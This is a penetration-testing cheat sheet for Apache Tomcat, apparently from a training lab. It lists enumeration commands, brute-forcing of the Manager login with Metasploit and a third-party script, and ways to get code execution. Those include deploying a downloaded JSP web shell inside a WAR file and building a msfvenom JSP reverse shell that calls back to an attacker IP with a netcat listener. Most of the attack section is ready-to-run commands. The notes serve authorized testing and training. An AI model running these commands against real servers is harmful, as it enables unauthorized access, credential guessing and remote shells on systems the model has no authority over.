Tomcat

Footprinting & Enumeration

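# Finding Version
# The bundled docs page names the exact release; the default 404 error page also leaks it
# (e.g. "Apache Tomcat/9.0.30") if /docs/ has been removed. Port 8080 is the default; adjust
# to whatever the target listens on.
curl -s http://site.local:8080/docs/ | grep -i tomcat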

# Important files and folders to look for information
conf/tomcat-users.xml              (users, passwords and roles such as manager-gui / admin-gui)
conf/web.xml and <app>/WEB-INF/web.xml   (servlet mappings, security constraints)

/manager        (Manager application - deploy / undeploy WARs)
/host-manager   (Host Manager application - virtual hosts)

Gobuster

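# Directory Busting
# Port and wordlist path depend on the target / distro; the original note had a broken
# "http:/" scheme, which gobuster rejects.
gobuster dir -u http://site.local:8180/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt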

Attacking

Brute Forcing

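# Tomcat Manager - Login Brute Force
# Metasploit - the module defaults to the bundled tomcat_mgr_default_users/pass wordlists
# and to TARGETURI /manager/html.
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS <target-ip>
set VHOST web01.inlanefreight.local
# Tomcat default port is 8080; 8180 is what this lab uses
set RPORT 8180
set TARGETURI /manager/html
set STOP_ON_SUCCESS true
# NOTE: Tomcat ships with LockOutRealm enabled (5 failures -> 300 s lockout by default),
# so a large wordlist can lock out the very account you are guessing and is noisy in the logs.
run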

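# Python Script (third-party tool - review it before running against a client target)
# LINK : https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce
# Same LockOutRealm caveat as above: 5 failed logins lock the account for 300 s by default.
python3 mgr_brute.py -U http://site.local:8180/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt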

Code Execution

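# With valid credentials, browse to http://site:8180/manager/html
# (needs the manager-gui role; manager-script is enough for the text API at /manager/text)
# Upload a WAR file containing a JSP web shell.
# NOTE: cmd.jsp is third-party code that you are deploying onto the target and it has no
# authentication of its own - read it first, and undeploy the app (Manager -> Undeploy)
# when the engagement is over so the shell is not left behind.
wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
# A WAR is just a zip; the file name (backup) becomes the context path (/backup)
zip backup.war cmd.jsp

# Execute Commands
# Quote the URL so the shell does not treat '?' as a glob; URL-encode arguments with spaces.
curl 'http://site:8180/backup/cmd.jsp?cmd=id'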

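# OR use msfvenom to create a WAR reverse shell.
# Start a listener first, e.g.  nc -lvnp 4443  or
#   msfconsole -q -x 'use multi/handler; set payload java/jsp_shell_reverse_tcp; set LHOST 10.10.14.15; set LPORT 4443; run'
# -o writes the file directly instead of relying on shell redirection (no empty backup.war on error).
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=4443 -f war -o backup.war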

# OR use the exploit/multi/http/tomcat_mgr_upload Metasploit module to automate the whole process (login, WAR upload, execution); it needs the same manager credentials and port settings as above.
